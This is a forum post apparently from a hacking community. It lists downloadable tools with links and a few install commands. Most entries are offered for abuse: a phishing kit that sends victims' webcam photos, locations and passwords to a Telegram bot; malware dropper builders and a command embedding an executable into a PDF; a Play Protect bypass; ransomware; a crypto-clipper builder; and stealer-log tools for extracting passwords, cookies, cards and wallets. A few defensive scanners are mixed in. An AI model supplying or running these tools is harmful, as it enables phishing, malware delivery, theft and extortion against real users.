Library of various software and scripts

Professor

Professional
Messages
758
Reaction score
830
Points
93

MangoKeyword [3.4.1]​

Mango Keywords is a handy keyword search tool that includes validation tools, parsers, utilities, and keyword generators.

Peculiarities:
  • Parser. Allows you to analyze pages from Google, Bing, Ask, Yandex, Start Page, Yahoo, Yahoo Japan, AOL, Naver, Baidu, Excite, Ecosia, and DuckDuckGo. Configurable filtering options and support for HTTP/S and SOCKS5 proxies.
  • Keyword generator. The program features Keyword Diareah, a fast scraper for search predictions, as well as random word, synonym, and adjective generators.
  • Utilities. These include a parameter extractor, keyword extractor, AIO extractor, parameter cleaner, keyword cleaner, URL filter, and Unicode remover.
  • URL Privacy Checker. Allows you to check whether URLs are public.
  • Automation configuration. For example, you can configure the VPN server to change every 5 minutes.
  • Binary files for Linux and Windows.
  • User-friendly text and graphical interface

https://github.com/mrshenmochi/-Mango-Keyword-

Trixter​

Trixter is a very simple yet powerful phishing tool. It has a limited number of phishing variants, but they are quite optimal and suitable for all situations.

Trixter has three phishing options: camera image capture, GPS data acquisition, and data such as login, password, and code from SMS or email. All data is sent to a Telegram bot, which is configured during installation.

Options:
  • Email. The email option allows you to create a simple registration page where you enter your email address, create a password, and then re-enter it. However, there are some requirements. The email address must comply with the email format requirements. The same applies to password strings. Passwords shouldn't be simple, such as 12345678, qwerty, and so on, and they have a length limit (minimum 8 characters). These requirements may seem difficult for phishing, but this only works in the phishing author's favor.
  • Phone. It's exactly the same with a phone. Considering that phone numbers are more often used for authorization on more serious platforms (e.g., Telegram, VK, etc.), and are simple and familiar to everyone, this option may well improve your chances. After the first registration step, the user waits for a code via SMS.
  • People Nearby [Telegram]. Telegram has disabled this feature, but it's good for us. This option allows you to create a page that offers to find users in a specified location or by username. When a search is attempted, the page sends the user's exact coordinates to the attacker via a Telegram bot.
  • Hacking WiFi. There's no harm in dreaming, even though it's possible. However, the average person isn't averse to hogging their neighbor's free internet, especially when their gigabytes are running low or they just want to check something interesting.
  • Hack the intercom. The author kept silent about this part.
  • Captcha. A light captcha where you have to confirm you're not a robot. But with a twist. Upon confirming you're not a robot, the attacker receives coordinates.
  • Mining. The world has come up with all sorts of ways to get us to mine using someone else's product. Like, for example, a hamster slipper. But this is a bit different. When a user starts mining non-existent coins, the attacker will obtain their coordinates.
  • Captcha. Type camera. This variant is identical to the previous captcha variant. However, instead of coordinates, the attacker receives a photo from the user's webcam.
  • Mama's X3000 security scanner. Searching by biometrics? Interesting. You point the camera and hit "search." The system offers searches not only across social networks but also across various systems, like the Ministry of Internal Affairs or some US Secret Service. Just imagine: someone carefully points the camera at an object, hits "search," expecting the search to begin based on the target's biometrics. And then the webcam turns on and takes a photo of their frowning, carefully concealed face. Naturally, the attacker posts this photo to Telegram.

Installation:
Code:
pkg update 
pkg upgrade 
pkg install nodejs git
git clone https://github.com/termuxtreem/trixter
cd trixter
node index.js

https://github.com/termuxtreem/trixter

Play Protect​

A utility with a wide range of settings for signing .apk applications and bypassing Google Play security.

Peculiarities:
  • Sign .APK
  • Convert more options
  • Changing memory file
  • Extract apk tool

https://github.com/Cyber-Root0/BypassPlayProtect

BUT IN MY OPINION IT'S MORE CONVENIENT TO DO IT THROUGH A BOT

DETAILS HERE https://github.com/Bypass-Google-Play-Protect/Bypass-Google-Play-Protect?tab=readme-ov-file

394a9cf5-45dd-4f5b-886b-369e59f4d32e.png


TGConverter​


ffc8073c-a54b-48b6-8918-40504e4dbeff.jpeg
[

The software is a simple Telegram account converter.

Peculiarities:
  • tdata to .session
  • .session to tdata
  • [mass] tdata to .session

DOWNLOAD
https://wdfiles.ru/O8j8

PASSWORD
https://t.me/+XJPVxxlZSYAyYmRi

KnightLNK builder [+Source]​


6d53ff7a-5071-4af0-a764-31daf19fbcb3.png


This is a simple tool written in C# for creating files that reference remote files, then installing and running them silently.

Peculiarities:
  • Link Dropper
  • HTA-Dropper
  • CMD-Dropper
  • BAT-Dropper
  • VBS-Dropper

https://github.com/offsoc/KnightLNK_builder/blob/main/screen1.png

DorkBuster​

A dork generation app with a beautiful visual interface and support for Google and Github.

.net is required for this to work .

Peculiarities:
  • Clean GUI/Easy Navigation
  • Built-In Error Logging
  • Blazing Fast
  • Targeted Dork Generation

https://github.com/kap0nedotexe/DorkBuster

XWallet​

Private crypto wallet software, which retailed for $500 and offers impressive functionality for managing crypto wallets.

Peculiarities:

Opening hours:
  • Log mode - in this mode, the software extracts wallets and passwords from the log. Both a single log and a folder with multiple logs are supported.
  • Brute force mode - selective password selection for one wallet.
  • Browser database dump mode. This dump allows you to quickly detect wallets that use hardware wallets and retrieve addresses and other wallet information.

Functional:
  • Support for more than 50 wallets.
  • The software even works with the latest version of OKX, which is tied to the user's hardware.
  • Works with Chromium, Firefox, Safari browsers - a complete set.
  • Maximum speed thanks to native code.
  • Full integration with Hashcat.
  • You can also use Hashcat Rules to generate new passwords based on passwords found in the log, which will significantly increase the chance of successfully guessing a password.
  • Collection of seed phrases from files, including image search using a trained OCR model.
  • Support for a large number of languages.

СКАЧАТЬ
https://wdfiles.ru/O79d

PASSWORD
https://t.me/+XJPVxxlZSYAyYmRi

NoMoreCookies​


b9157b2e-d9be-4d75-8bab-891081d2fe77.jpeg


Browser Protector is a security tool against various types of theft, written in C# and C/C++. It works by intercepting NtCreateFile and NtOpenFile, preventing access to browser files, and also preventing certain types of connections. Compatible with various games and software.

Tested on the following Stealers/RATs:
  • AsyncRAT
  • Quasar RAT
  • StormKitty
  • HackBrowserData
  • FireFox-Thief
  • DCRat
  • Umbral Stealer
  • Blank Grabber
  • Venom RAT
  • XWorm RAT
  • Raccoon Stealer
  • EdgeGuard
  • Vidar
  • RedLine

The software should work against other popular stealers. Please note that this protection works not only against the malware listed above, but also against future stealers. This protection method is universal.

Supported browsers:
  • Firefox
  • Brave
  • Chrome
  • Microsoft Edge
  • Yandex
  • Opera
  • Waterfox
  • Vivaldi

https://github.com/AdvDebug/NoMoreCookies?tab=readme-ov-file

Discord Captcha Fishing​

Automation of fake captcha via Discord authorization. The script is written in JavaScript.

https://github.com/45hr/Discord-Captcha-Fishing

Last Level Security​

The tool is designed for encrypting data (folders/files). The developer was inspired by the work of VeraCrypt.

Encryption algorithms:
  • Block cipher
  • Initialization vector (IV)
  • Block addition: The first block of data is concatenated with the initialization vector before encryption, and each subsequent block of data is concatenated with the previously encrypted block, meaning that changing any block of data will affect all subsequent encrypted blocks.
  • Using entropy to generate a key makes it less predictable
  • Every time you encrypt data, creating a new initialization vector using random data helps avoid brute-force attacks.
  • CBC mode provides an additional level of security by adding randomness to the encryption process.
  • Hash-based Message Authentication Code (HMAC) – allows you to verify whether data has been altered or corrupted during transmission. Only the owner of this key can generate a valid HMAC value. This ensures that the data actually originates from the expected source. If it doesn't match during verification, it means the data has been compromised. If an attacker doesn't know the secret key, they can't generate a correct HMAC for a modified message (as in man-in-the-middle attacks and replay attacks). Using a strong hash function provides an additional level of security.

https://github.com/reyzovw/LastLevelSecurity

PDF Auto Downloader​

This program creates a PDF document with your download link. Once the user opens the PDF document, the file will download automatically, without any additional clicks.

Peculiarities:
  • Ability to embed any image
  • Ease of use
  • Support for links of any type

Hermetic PDF Exploit​

A fairly simple piece of software that allows you to inject your own Trojan code. As the name suggests, it all comes in .PDF format.

500e74d0-1ac9-451d-b298-ab5c1b321f59.png


Peculiarities:
  • Ease of use
  • Display any custom image on a PDF page
  • Combination with any type of link

File-PDF2EXE​

A Python script that embeds an executable file into a PDF file using JavaScript. The script uses the PyPDF2 and Pillow libraries to manipulate PDF files and images, and command-line arguments are handled using the argparse library.

Installing components:
Code:
pip install python-docx
pip install Pillow
pip install PyPDF2

Usage:
Code:
python file.py /home/Desktop/malware.exe /home/Desktop/README.pdf -o /home/Desktop/MALICIOUSFILE.pdf
 

Zeta Tools | Credit: SeedWork​

Seed phrase parser and crypto wallet balance checker for multiple networks with proxy support.

Peculiarities:
  • Proxy support
  • ETH/SOL/BTC
  • 30 threads

DOWNLOAD
https://wdho.ru/7Rak

Proxy Checker​


cb2f7e2c-f32e-4702-87b9-a36621246b6a.png


A proxy checker with a wide range of settings and support for all proxy types. It features a beautiful, clean visual interface and a detailed check results report.

Peculiarities:
  • Support for all proxy types
  • The ability to take a screenshot of the panel
  • Detailed report after inspection
  • Possibility of customization before testing
  • Multithreading
  • Fine-tuning websites to display proxy information
  • Judges

DOWNLOAD
https://wdho.ru/7Ram

StealerKiller​

This advanced info-stealer detection and removal tool is designed to protect your system from various types of information-stealing malware. The application provides comprehensive scanning and remediation to detect and eliminate information stealers that target your sensitive data.

Peculiarities

Multi-Vector Scanning:
  • Comprehensive system analysis including memory, filesystem, registry, and network connections

Known Stealer Detection: Signature-based detection for common infostealer families:
  • LummaC2
  • RedLine
  • Raccoon
  • Vidar
  • And more

Behavioral Analysis:
  • Advanced heuristic detection to identify unknown infostealers

Threat Remediation:
  • Automated removal of threats identified

Detailed Reporting:
  • Complete documentation of scan results with export capabilities

User-Friendly Interface:
  • Modern, intuitive UI designed for both security professionals and casual users

DOWNLOAD
https://wdho.ru/7Raj

UncPump | Credit: cuppy​

A simple tool to change file size in kb, mb, gb.

DOWNLOAD
https://wdho.ru/7Ral

Raccoon Clipper [4.0]​


aa55503e-51ff-4424-b2ac-f1890d996e36.png


A GUI-based program for creating custom cryptocurrency theft malware, written in Python.

DOWNLOAD
https://github.com/3022-2/raccoon_clipper

Citadel browser agent​

A browser extension that detects malware and shadow IT by analyzing and logging security events in a privacy-preserving manner. Comes pre-integrated with the open-source Wazuh SIEM.

Citadel can perform web filtering, limit the maximum duration of authentication sessions, enforce MFA policies, and assist with password policy enforcement.

DOWNLOAD
https://github.com/avanwouwe/citadel-browser-agent

Crypto Balance Checker seed phrases​

A desktop app for effortlessly checking cryptocurrency balances across multiple blockchain networks. Supports Bitcoin, Ethereum, Binance Smart Chain, and others.

DOWNLOAD
https://wdho.ru/7Ran

AsyncTraffic Converter​

A simple and convenient tool for converting Telegram .session files to tdata format, compatible with Telegram Desktop. The program offers a graphical user interface (GUI) and a command-line interface (CLI) for maximum flexibility, as well as support for various proxy types.

DOWNLOAD
https://github.com/asyncTraffic/telegram-converter

Hakuna Matata Ransomware [2.3]​

Hakuna Matata - Encrypts each file using AES-RSA and comes with several malicious features that can be disabled.

Peculiarities:
  • software wallpaper generation
  • AES-CBC-256/RSA-2048 encryption
  • Changing the icon of the ransomware executable files
  • change the ransom file name
  • Setting up ransom text
  • file encryption in progress

DOWNLOAD
https://wdho.ru/7Rao

Miner Search [v1.4.7.82]​


d90c4a19-bc6a-494f-85a0-0588948f189c.png


A program designed to find and eliminate hidden miners. It serves as an auxiliary tool for searching for suspicious files, directories, processes, and so on.

Peculiarities:
  • Checking for the presence of a rootkit in the system that can hide other malware (miner) in the task manager.
  • Scans active processes. The program flags all suspicious ones and terminates them immediately.
  • Scanning files and folders where miner files may be located.
  • Scans for malicious changes in the registry, task scheduler, and services. For services, the scan is performed based on the presence of a valid digital signature.
  • Automatically move files of suspicious or malicious processes to quarantine.
  • Signature scanning of all executable files on the local system drive.

DOWNLOAD
https://github.com/BlendLog/MinerSearch

Qu1cksc0pe​


f460671a-ed4a-4abd-9c37-1937beac5793.png


Qu1cksc0pe is a malware analysis tool that can analyze many types of files, from Windows binaries to email files.

With Qu1cksc0pe you can get information about used DLL files, functions and APIs, URLs, IP addresses and emails, Android permissions, file extensions and their names, attached executables and exploits.

Peculiarities:
  • Resource Analysis. Allows you to analyze the assets of a given file, as well as detect and extract embedded payloads from malware samples.
  • Hash Scan. You can check whether the hash value of a given file matches the built-in malware hash database. This feature can also scan directories.
  • MITRE ATT&CK Potential Table Generation. This feature allows you to generate potential tables based on an import/export table or functions contained in a specified file.
  • Programming language detection. You can get information about the programming language from a specified file.
  • Interactive shell. You can use Qu1cksc0pe in command-line mode.
  • Dynamic analysis of Android applications. To do this, connect a virtual or physical device to your computer.
    Analysis of Windows processes.

DOWNLOAD
https://github.com/CYB3RMX/Qu1cksc0pe

Telegram Sender [3.0]​

Telegram Sender is software for mass messaging to chats (groups) written in Python. Connection to accounts is via .session telethon.

In version 3.0:
  • + New interface
  • + Proxy test
  • Changed entry and dispatch delay
  • + Formatting in the context menu
  • + Statistics
  • + Select the proxy usage method
  • + Instructions

Peculiarities:
  • Multithreading
  • SOCKS5 proxy support
  • Detailed log
  • Working with multiple accounts
  • Working with multiple targets for mailing
  • Parsing
  • Checking your account for validity
  • Statistics
  • Proxy testing
  • Formatting text before sending
  • Joining chats

DOWNLOAD
https://wdho.ru/7Rat

HACKUS MAIL CHECKER [2.3]​

HACKUS MAIL CHECKER is a specialized program for bulk checking of mailboxes for messages, availability, and other parameters. It can be used for email monitoring, attachment searches, and other email account-related tasks. The program supports various mail access protocols (IMAP, POP3), as well as proxy servers for anonymity.

DOWNLOAD
https://wdho.ru/7Rau

BLTools [3.0.0]​


86449d86-732a-42ed-8f52-2220d91b556b.png


This program validates cookies and logs for various services (Steam, Netflix, YouTube, etc.) with and without a proxy. It organizes data into convenient files and folders, streamlining the verification process.

Peculiarities

Checking cookies and logs for multiple services:
  • Supports a wide range of platforms, including Steam, Roblox, Netflix, Amazon, YouTube, Twitch, TikTok, Instagram, Twitter, Facebook, Coinbase, KuCoin, Discord, and many more.
  • Allows you to check cookie validity without using a proxy, which simplifies the process but may reduce anonymity.
  • Automatically sorts data by service into separate folders and text files for easy analysis.

Search and sort passwords:
  • Extracts login:password and email:password combinations from logs, creating databases in .txt format.
  • PasswordSearcher allows you to create Email:Pass and Login:Pass databases, which is convenient for further use in attacks.

Checking crypto wallets and balances:
  • Supports checking crypto wallet balances through services such as Debank and Etherscan.
  • For Metamask wallets, it extracts seed phrases and generates passwords from the Password.txt file.

Search credit cards and billing information:
  • Searches for credit card data in logs, including a unique billing code search feature.
  • Sorts AutoFills data such as phone numbers, emails, addresses, etc. for future use.

Checking platform-specific features:
  • For TikTok: coin verification and LiveCenter.
  • For YouTube: monetization analysis and checking all channels for information.
  • For Steam: checking the level of Faceit accounts.
  • For Twitch: Check your Prime status.
  • For Gmail: improved email filtering, changing UserAgent to increase cookie lifetime.

DOWNLOAD
https://wdho.ru/c3jC

And of course, our favorite win rar.​

Let me explain for those who don't know (which turns out to be 70% of the audience).

WinRAR is an archiver, a program for compressing and decompressing files. It allows you to create archives. WinRAR's main purpose is to reduce file size for ease of storage and transfer, and to protect data using encryption. In 99.99% of cases, all software, scripts, manuals, etc., are usually stored in archives, and to work with archives, you need an archiver.

www.win-rar.com
 
Top